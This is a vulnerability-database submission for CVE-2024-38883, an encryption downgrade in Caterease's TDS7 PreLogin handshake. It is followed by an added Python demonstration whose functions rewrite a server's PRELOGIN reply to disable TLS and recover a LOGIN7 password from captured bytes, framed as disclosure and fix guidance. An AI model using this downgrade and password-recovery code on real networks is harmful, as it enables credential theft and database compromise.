Submission #383223: Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Title: Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Description:

NOTE - This submission shall be embargoed until 14:00 CET on 2024-08-01 - NOTE

CVE-2024-38883: An issue in Horizon Business Services Inc. Caterease Software allows a remote attacker to perform a Drop Encryption Level attack due to the selection of a less-secure algorithm during negotiation.

Vulnerability Type: CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
Vendor of the Product: Horizon Business Services Inc.
Affected Product: Caterease Software
Affected Versions: 16.0.1.1663 through 24.0.1.2405
Attack Vector: Remote
Attack Type: CAPEC-620: Drop Encryption Level

Vulnerability Summary: Caterease Software does not enforce encryption during the TDS7 PreLogin authentication sequence, making it susceptible to a downgrade attack. An attacker positioned between the Caterease client and the SQL server can intercept the initial PreLogin handshake and rewrite the server's response so that it indicates encryption is not supported. The client then proceeds without TLS and sends the LOGIN7 packet, including the database credentials, in plaintext over the network. By capturing these unencrypted credentials the attacker gains unauthorized access to the SQL database. This compromises the confidentiality of the credentials and also allows the attacker to read, modify, or delete database records, leading to significant data breaches and integrity issues.

CVSS Base Score: Critical Risk - 9.3
CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Exploitability Metrics
Attack Vector (AV): Adjacent Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Changed

Impact Metrics
Confidentiality (C): High
Integrity (I): High
Availability (A): None
User: jTag Labs (UID 51246)
Submitted: 2024-07-30 16:53 (2 years ago)
Moderated: 2024-08-01 14:14 (2 days later)
Status: Accepted
VulDB Entry: 273367 [Horizon Business Services Caterease up to 24.0.1.2405 TDS7 PreLogin Authentication weak encryption]
Points: 17
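The negotiation described in the Vulnerability Summary above, as an added example that is not part of the submission and is not Caterease, VulDB or Microsoft code. It builds and parses TDS PRELOGIN packets following the MS-TDS wire layout (option token table, 0xFF terminator, option data), performs the on-path rewrite of the server's ENCRYPTION option to ENCRYPT_NOT_SUP, and contrasts a client that accepts the downgrade with one that refuses it. It also shows why a captured LOGIN7 counts as plaintext: the password field is only nibble-swapped and XORed with 0xA5, which is reversible. The server VERSION bytes, the require_encryption flag and the sample password are constructed for the example.

```python
"""TDS7 PRELOGIN encryption downgrade: packet builder/parser, on-path rewrite,
client policy, and LOGIN7 password (de)obfuscation. Constructed example."""
import struct

TDS_PRELOGIN = 0x12                      # TDS packet type: PRELOGIN
TDS_STATUS_EOM = 0x01                    # end-of-message flag in the header
OPT_VERSION, OPT_ENCRYPTION, OPT_TERMINATOR = 0x00, 0x01, 0xFF

# Values of the ENCRYPTION option exchanged in PRELOGIN (MS-TDS)
ENCRYPT_OFF, ENCRYPT_ON, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0x00, 0x01, 0x02, 0x03


def build_prelogin(options):
    """Serialize {token: bytes} into one TDS packet: 8-byte header, a table of
    (token, offset, length) entries, the 0xFF terminator, then option data."""
    tokens = sorted(options)
    table_len = 5 * len(tokens) + 1              # 5 bytes per entry + terminator
    table, data = bytearray(), bytearray()
    for tok in tokens:
        val = options[tok]
        # offsets are relative to the start of the PRELOGIN payload
        table += struct.pack(">BHH", tok, table_len + len(data), len(val))
        data += val
    table.append(OPT_TERMINATOR)
    payload = bytes(table + data)
    # header: type, status, total length, SPID, packet id, window
    header = struct.pack(">BBHHBB", TDS_PRELOGIN, TDS_STATUS_EOM,
                         8 + len(payload), 0, 1, 0)
    return header + payload


def parse_prelogin(packet):
    """Inverse of build_prelogin; rejects option offsets that point outside
    the packet instead of reading past the buffer."""
    ptype, _status, length, _spid, _pid, _win = struct.unpack(">BBHHBB", packet[:8])
    if ptype != TDS_PRELOGIN or length != len(packet):
        raise ValueError("not a complete PRELOGIN packet")
    payload, options, pos = packet[8:], {}, 0
    while payload[pos] != OPT_TERMINATOR:
        tok, off, ln = struct.unpack(">BHH", payload[pos:pos + 5])
        if off + ln > len(payload):
            raise ValueError("option %#x points outside the packet" % tok)
        options[tok] = payload[off:off + ln]
        pos += 5
    return options


def mitm_downgrade(server_reply):
    """The on-path attacker's step: leave the server's PRELOGIN reply intact
    except for the ENCRYPTION byte, which becomes ENCRYPT_NOT_SUP."""
    opts = parse_prelogin(server_reply)
    opts[OPT_ENCRYPTION] = bytes([ENCRYPT_NOT_SUP])
    return build_prelogin(opts)


def client_decide(server_reply, require_encryption):
    """Client policy after reading the server's ENCRYPTION byte. Returns 'tls'
    (run the TLS handshake before LOGIN7), 'plaintext' (send LOGIN7 as is) or
    'abort'. require_encryption=False is the vulnerable behaviour described in
    the submission; True is the hardened client that cannot be downgraded."""
    answer = parse_prelogin(server_reply)[OPT_ENCRYPTION][0]
    if answer == ENCRYPT_NOT_SUP:
        return "abort" if require_encryption else "plaintext"
    return "tls"   # OFF (login only), ON and REQ all start TLS before LOGIN7


def login7_obfuscate_password(password):
    """LOGIN7 password encoding: UTF-16LE, each byte nibble-swapped, then XOR
    0xA5. This is obfuscation, not encryption: no key is involved."""
    out = bytearray()
    for b in password.encode("utf-16-le"):
        out.append((((b << 4) | (b >> 4)) & 0xFF) ^ 0xA5)
    return bytes(out)


def login7_recover_password(blob):
    """What an attacker does with a captured plaintext LOGIN7: undo the XOR and
    the nibble swap to get the credential back."""
    out = bytearray()
    for b in blob:
        x = b ^ 0xA5
        out.append(((x << 4) | (x >> 4)) & 0xFF)
    return out.decode("utf-16-le")


# Constructed sample: a server with TLS available but not required (ENCRYPT_OFF)
SERVER_VERSION = bytes([0x0F, 0x00, 0x0F, 0xA0, 0x00, 0x00])   # fake version bytes
SERVER_REPLY = build_prelogin({OPT_VERSION: SERVER_VERSION,
                               OPT_ENCRYPTION: bytes([ENCRYPT_OFF])})
DOWNGRADED_REPLY = mitm_downgrade(SERVER_REPLY)

if __name__ == "__main__":
    print("honest reply  ->", client_decide(SERVER_REPLY, False))
    print("downgraded, vulnerable client ->", client_decide(DOWNGRADED_REPLY, False))
    print("downgraded, hardened client   ->", client_decide(DOWNGRADED_REPLY, True))
    blob = login7_obfuscate_password("S3cr3t!")
    print("captured LOGIN7 password bytes:", blob.hex(), "->", login7_recover_password(blob))
```

The fix the hardened branch models is client-side: the server cannot protect a client that will accept ENCRYPT_NOT_SUP from anyone on the path, so the client has to refuse to send LOGIN7 unless TLS was negotiated, regardless of what the PRELOGIN reply says.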
